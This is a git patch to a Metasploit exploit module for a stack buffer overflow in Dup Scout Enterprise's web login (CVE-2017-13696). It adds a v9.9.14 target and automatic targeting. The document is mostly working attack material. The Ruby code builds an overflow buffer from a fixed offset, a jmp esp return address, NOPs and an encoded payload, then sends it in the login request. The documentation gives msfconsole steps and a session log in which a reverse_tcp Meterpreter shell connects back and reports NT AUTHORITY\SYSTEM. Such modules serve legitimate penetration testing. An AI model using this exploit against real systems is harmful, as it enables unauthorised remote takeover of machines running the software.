From f89d67df1931022ea2e96dd54948afdbff4b0ba4 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Thu, 25 Feb 2021 17:14:25 +0000
Subject: [PATCH] dup_scout_enterprise_login_bof: Add v9.9.14 target and auto
 targeting

---
 .../http/dup_scout_enterprise_login_bof.md    |  89 +++++---
 .../http/dup_scout_enterprise_login_bof.rb    | 192 ++++++++++++------
 2 files changed, 185 insertions(+), 96 deletions(-)

diff --git a/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md b/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
index febc1e85b9d3..fdfda0b0ae5e 100644
--- a/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
+++ b/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
@@ -1,47 +1,72 @@
 ## Vulnerable Application
 
-  Tested on Windows 10 x64
+This module exploits a stack buffer overflow in Dup Scout Enterprise
+versions <= 10.0.18. The buffer overflow exists via the web interface
+during login. This gives NT AUTHORITY\SYSTEM access.
 
-  Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port.
+This module has been tested successfully on Dup Scout Enterprise
+versions:
 
-  [Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)
+* 9.9.14 on Windows 7 SP1 (x64)
+* 9.9.14 on Windows XP SP0 (x64)
+* 10.0.18 on Windows 7 SP1 (x64)
+* 10.0.18 on Windows XP SP0 (x86)
+* 10.0.18 on Windows 10 (1909) (x64)
 
 ## Verification Steps
 
-  1. Install the application and set the option above to enable the web server
-  2. Start msfconsole
-  3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof```
-  5. Set options and payload
-  6. Do: ```run```
-  7. You should get a shell.
+Download:
 
-## Options
+* [Dup Scout Enterprise v9.9.14](https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe)
+* [Dup Scout Enterprise v10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)
 
-  **RHOST**
+Install the application from the link above and enable the web server by going to
+Tools -> Advanced Options -> Server -> Enable Web Server on Port.
 
-  IP address of the remote host running the server.
+Metasploit:
 
-  **RPORT**
+1. Install the application and set the option above to enable the web server
+1. Start msfconsole
+1. Do: `use exploit/windows/http/dup_scout_enterprise_login_bof`
+1. Do: `set rhosts <rhosts>`
+1. Do: `run`
+1. You should get a shell.
 
-  Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.
+## Options
 
 ## Scenarios
 
-  To obtain a shell:
-
-  ```
-msf > use exploit/windows/http/dup_scout_enterprise_login_bof
-msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp
-payload => windows/meterpreter/reverse_tcp
-msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171
-rhost => 192.168.1.171
-msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252
-lhost => 192.168.1.252
-msf exploit(windows/http/dup_scout_enterprise_login_bof) > run
-
-[*] Started reverse TCP handler on 192.168.1.252:4444
-[*] Generating exploit...
-[*] Triggering the exploit now...
-[*] Sending stage (179779 bytes) to 192.168.1.171
-[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600
-  ```
+### Dup Scout Enterprise version 10.0.18 (x86) on Windows 10 (1909) (x64)
+
+```
+msf6 > use exploit/windows/http/dup_scout_enterprise_login_bof 
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set rhosts 172.16.191.199
+rhosts => 172.16.191.199
+msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 172.16.191.192 
+lhost => 172.16.191.192
+msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > run
+
+[*] Started reverse TCP handler on 172.16.191.192:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Dup Scout Enterprise version 10.0.18.
+[*] Selecting a target...
+[*] Using target: Dup Scout Enterprise 10.0.18 (x86)
+[*] Generating payload ...
+[*] Sending payload (10000 bytes) ...
+[*] Sending stage (175174 bytes) to 172.16.191.199
+[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:50196) at 2021-02-22 21:14:52 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-6VPIDIM
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 17
+Meterpreter     : x86/windows
+meterpreter >
+```
+
diff --git a/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb b/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
index 0ed698899998..2fee48f72dee 100644
--- a/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
+++ b/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
@@ -4,99 +4,163 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Dup Scout Enterprise Login Buffer Overflow',
-      'Description'    => %q{
-        This module exploits a stack buffer overflow in Dup Scout Enterprise
-        10.0.18. The buffer overflow exists via the web interface during
-        login. This gives NT AUTHORITY\SYSTEM access.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Chris Higgins', # msf Module -- @ch1gg1ns
-          'sickness' # Original discovery
-        ],
-      'References'     =>
-        [
-          [ 'CVE', '2017-13696' ],
-          [ 'EDB', '43145' ]
-        ],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread'
+    super(
+      update_info(
+        info,
+        'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
+        'Description' => %q{
+          This module exploits a stack buffer overflow in Dup Scout Enterprise
+          versions <= 10.0.18. The buffer overflow exists via the web interface
+          during login. This gives NT AUTHORITY\SYSTEM access.
+
+          This module has been tested successfully on Dup Scout Enterprise
+          versions:
+
+          9.9.14 on Windows 7 SP1 (x64);
+          9.9.14 on Windows XP SP0 (x64);
+          10.0.18 on Windows 7 SP1 (x64);
+          10.0.18 on Windows XP SP0 (x86); and
+          10.0.18 on Windows 10 (1909) (x64).
         },
-      'Platform'       => 'win',
-      'Payload'        =>
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'sickness', # Original discovery and exploit
+            'Chris Higgins', # msf Module -- @ch1gg1ns
+            'bcoles', # Automatic targetting and v9.9.14 target
+          ],
+        'References' =>
+          [
+            ['CVE', '2017-13696'],
+            ['CWE', '121'],
+            ['EDB', '42557'],
+            ['EDB', '43145'],
+            ['EDB', '40832']
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread'
+          },
+        'Platform' => 'win',
+        'Arch' => ARCH_X86,
+        'Payload' =>
+          {
+            'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
+          },
+        'Targets' =>
+          [
+            [ 'Automatic', { 'auto' => true } ],
+            [
+              'Dup Scout Enterprise 9.9.14 (x86)',
+              {
+                # 0x100b5612 : push esp # ret  | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+                'Version' => '9.9.14',
+                'Ret' => 0x100b5612,
+                'Offset' => 780
+              }
+            ],
+            [
+              'Dup Scout Enterprise 10.0.18 (x86)',
+              {
+                # 0x10090c83 : jmp esp |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+                'Version' => '10.0.18',
+                'Ret' => 0x10090c83,
+                'Offset' => 780
+              }
+            ],
+          ],
+        'Notes' =>
         {
-          'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
         },
-      'Targets'        =>
-        [
-          [ 'Dup Scout Enterprise 10.0.18',
-            {
-              'Ret' => 0x10090c83, # jmp esp - libspp.dll
-              'Offset' => 780
-            }
-          ],
-        ],
-      'Privileged'     => true,
-      'DisclosureDate' => '2017-11-14',
-      'DefaultTarget'  => 0))
+        'Privileged' => true,
+        'DisclosureDate' => '2017-11-14',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options([Opt::RPORT(80)])
-
   end
 
   def check
     res = send_request_cgi({
-      'uri'    => '/',
+      'uri' => '/',
+      'method' => 'GET'
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    version = res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first
+
+    unless version
+      return CheckCode::Safe('Target is not Dup Scout Enterprise.')
+    end
+
+    unless target_for_version(version)
+      return CheckCode::Detected("No targets for Dup Scout Enterprise version #{version}.")
+    end
+
+    CheckCode::Appears("Dup Scout Enterprise version #{version}.")
+  end
+
+  def dup_version
+    res = send_request_cgi({
+      'uri' => '/',
       'method' => 'GET'
     })
 
-    if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
-      return Exploit::CheckCode::Appears
+    unless res
+      return fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.')
     end
 
-    return Exploit::CheckCode::Safe
+    res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first
+  end
+
+  def target_for_version(version)
+    return unless version
+    targets.select { |t| version == t['Version'] }.first
   end
 
   def exploit
-    connect
+    my_target = target
+
+    if target.name == 'Automatic'
+      print_status('Selecting a target...')
+      my_target = target_for_version(dup_version)
+      unless my_target
+        fail_with(Failure::NoTarget, 'Unable to automatically detect a target')
+      end
+    end
+
+    print_status("Using target: #{my_target.name}")
 
-    print_status("Generating exploit...")
+    print_status('Generating payload ...')
 
-    evil =  rand_text(target['Offset'])
-    evil << [target.ret].pack('V')
+    evil = rand_text(my_target['Offset'])
+    evil << [my_target.ret].pack('V')
     evil << make_nops(12)
     evil << payload.encoded
-    evil << make_nops(10000 - evil.length)
-
-    vprint_status("Evil length: " + evil.length.to_s)
-
-    sploit =  "username="
-    sploit << evil
-    sploit << "&password="
-    sploit << rand_text(evil.length)
-    sploit << "\r\n"
+    evil << make_nops(10_000 - evil.length)
 
-    print_status("Triggering the exploit now...")
+    print_status("Sending payload (#{evil.length} bytes) ...")
 
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => '/login',
       'method' => 'POST',
-      'content-type' => 'application/x-www-form-urlencoded',
-      'content-length' => '17000',
-      'data' => sploit
+      'vars_post' => {
+        'username' => evil,
+        'password' => rand_text(10..20)
+      }
     })
-
-    handler
-    disconnect
-
   end
 end